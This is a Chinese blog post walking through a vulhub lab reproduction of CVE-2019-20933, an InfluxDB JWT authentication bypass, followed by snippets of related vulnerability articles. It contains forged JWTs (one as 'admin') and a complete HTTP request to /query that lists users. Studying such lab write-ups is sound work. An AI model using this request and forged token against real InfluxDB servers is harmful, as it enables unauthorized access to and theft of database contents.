CVE-2019-20933-influxdb未授权访问-vulhub

最新推荐文章于 2024-08-13 00:00:00 发布
最新推荐文章于 2024-08-13 00:00:00 发布
阅读量700 收藏 11
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c0529/article/details/139624041
版权

1.原理

参考:https://blog.csdn.net/tqlisno1/article/details/109110644

InfluxDB 未授权访问 漏洞复现_influxdb未授权访问复现-CSDN博客

InfluxDB 是一个开源分布式时序、时间和指标数据库,使用 Go 语言编写,无需外部依赖。其设计目标是实现分布式和水平伸缩扩展,是 InfluxData 的核心产品。其使用 jwt 作为鉴权方式。在用户开启了认证,但未设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在 InfluxDB 中执行SQL语句。

影响:InfluxDB < 1.7.6

2.复现

使用docker镜像

访问页面看配置

访问/query,显示需要登录

由于influxdb输入信息使用jwt的验证方式生成令牌,在令牌中放入时间戳表示令牌的过期时间,本漏洞的产生原因是在生成jwt的时候该influxdb没有设置加密秘钥,我们直接生成一个用户

生成jwt https://jwt.io/

时间戳生成

时间戳(Unix timestamp)转换工具 - 在线工具

所以我们需要一个username和exp,exp填入的时间戳是一个未来的

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IkpvaG4gRG9lIiwiZXhwIjoxNzIwNzAyNDQ2fQ.lao5PXaq14nU1C9InPZt7F-P0dxxLpcnc11C1nnbJkg

取消登录后发现出现这个页面,待会使用`Authorization: Bearer`方式提交我们的jwt,这 是一个 HTTP 头部字段,用于在客户端和服务器之间传输访问令牌(access token)。这种授权机制通常用于OAuth 2.0框架中,允许第三方应用访问用户在服务提供者上存储的受保护的资源。
抓包:

POST /query HTTP/1.1//改成post
Host: 192.168.61.10:8086
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzIwNzAyNDQ2fQ.kG23zjGNfMLfa8DLOxINHFqdEpEm5MQ5yRF85uzhodQ
Content-Length: 26
Content-Type:application/x-www-form-urlencoded//用post方式记得加上这条

db=sample&q=show+users//显示返回值

我出现的问题是返回错误值p,记得加上content-type,数据包内容我放在这了,改一下host就可以用了,修改q的值可以返回信息或者:
可以直接连接数据库,但是需要下载influxdb-client,我的kali突然下不了了,我就不做了,参考里面有

当然,记得做完要关闭容器

小狗学士
关注
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
数据库安全InfluxDB 授权访问-Jwt验证不当 漏洞.
网络安全领域___专研者.
11-11 1500
InfluxDB 是一个开源分布式时序,时间和指标数据库。其数据库是使用​​​​​​​Jwt 作为鉴权方式,在用户开启认证时,如果在设置参数shared-secret的情况下,Jwt 认证密钥为空字符串,这样攻击者就能伪造任意用户身份在 InfluxDB 数据库中执行SQL语句,因此会导致敏感信息泄露和执行威胁到数据库的数据命令.
数据库安全+漏洞复现
qq_74806534的博客
04-05 1257
1.端口扫描端口扫描工具nmap.....为什么有数据库,却扫描不到端口?当数据库在内网的时候,我们的在外网是扫描不到的。有可能是防火墙或者其他的安全服务2.组合猜测当面对一个web服务时,我们大概能猜到有没有数据库3.信息来源通过渗透过程的一下信息泄露,或者报错判断1.数据库2.文件传输3.远程控制4.数据通信1.特性漏洞2.授权访问3.弱口令爆破。
5大数据库授权访问漏洞深度剖析【黑客最爱的‘甜点‘】
最新发布
2301_80064376的博客
08-13 1299
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。靶场Hadoop YARN ResourceManager 授权访问漏洞是一个严重的安全隐患,它潜伏在许多经正确配置的 Hadoop 集群中。这个漏洞的核心问题在于 YARN 的 ResourceManager 组件在默认情况下可能没有启用适当的访问控制机制。
influxdb授权访问漏洞
zzzzz1284的博客
03-13 667
influxdb授权访问漏洞
influxdb 授权访问
qq_53086690的博客
11-22 1194
influxdb 授权访问 influxdb简介 InfluxDB是一个由InfluxData开发的开源时序型数据。它由Go写成,着力于高性能地查询与存储时序型数据。InfluxDB被广泛应用于存储系统的监控数据,IoT行业的实时数据等场景。 影响版本 InfluxDB < 1.7.6 漏洞简介 influxdb是一个数据库,使用jwt认证方式。在用户开启了认证,但设置参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语
InfluxDB 授权访问漏洞复现
热门推荐
weixin_52125240的博客
03-16 1万+
InfluxDB 授权访问漏洞复现 前言:第一次复现漏洞,肯定会有很多不足的地方,这也是
Influxdb授权访问&CouchDB权限绕过
weixin_54882883的博客
07-21 502
当我们发送数据包,可以看见一个OK的时候啊。对应版本最好不要高于1.7.0。默认端口80868088。还要另外一个是需要抓数据包的。然后在数据中添加一个部分。数据包中需要添加两个东西。FOFA可以怎么去试试。你就可以尝试去登录一下。这时候就可以查数据了。就可能用户添加成功了。...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip
06-03
标题 "cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip" 指涉的是一个针对CVE-2019-2725漏洞的安全更新。CVE-2019-2725,全称“Common Vulnerabilities and Exposures”,是2019年发现的一个特定安全...
InfluxDB API 授权访问漏洞
weixin_44912035的博客
12-31 1388
InfluxDB是一个使用Go语言编写的开源分布式,支持高并发的时序数据库,其使用JWT作为鉴权方式。在用户开启了认证,但设置参数shared-secret的情况下,JWT的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在InfluxDB中执行SQL语句。 影响版本 InfluxDB < 1.7.6 的版本。 漏洞复现 标识:8086端口 HTTP API 的 X-Influxdb-Version 标志头 ...
(五)解决InfluxDB 授权访问
weixin_48226988的博客
12-31 6762
InfluxDB是一个由InfluxData开发的开源时序型数据库。它由Go写成,着力于高性能地查询与存储时序型数据。InfluxDB被广泛应用于存储系统的监控数据,IoT行业的实时数据等场景。 默认情况下InfluxDB没有开启认证措施,攻击者可以通过授权访问,构造相应的API请求,直接操作InfluxDB中的数据,可能导致敏感数据丢失或者泄漏。 开启InfluxDB 授权访问访问还是很简单的,操作步骤如下。 1、没有设置auth时,直接就显示了数据库内容 ~:influx > show data
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ran的博客
05-07 2901
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
授权访问服务搭建
公众号shadow sock7
06-04 1944
influxdb安装 参考: https://v2.docs.influxdata.com/v2.0/get-started/ wget https://dl.influxdata.com/influxdb/releases/influxdb_2.0.0-beta.8_linux_amd64.tar.gz tar zxf influxdb_2.0.0-beta.8_linux_amd64.tar....
漏洞复现Influxdb,H2database,couchDB,ElasticSearch
m0_63917373的博客
11-30 1566
漏洞复现Influxdb,H2database,couchDB,ElasticSearch vulhub vulfocus
CVE-2019-0708:3389远程桌面代码执行扩展CVE-2019-0708批量检测工具(Rdpscan Bluekeep Check)
02-05
微软3389远程漏洞CVE-2019-0708批量检测工具 0x001 Win下检测 https://github.com/robertdavidgraham/rdpscan C:\Users\K8team\Desktop\rdpscan-master\vs10\Release 的目录 2019/06/02 02:11 <DIR> . 2019/06/02 02...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值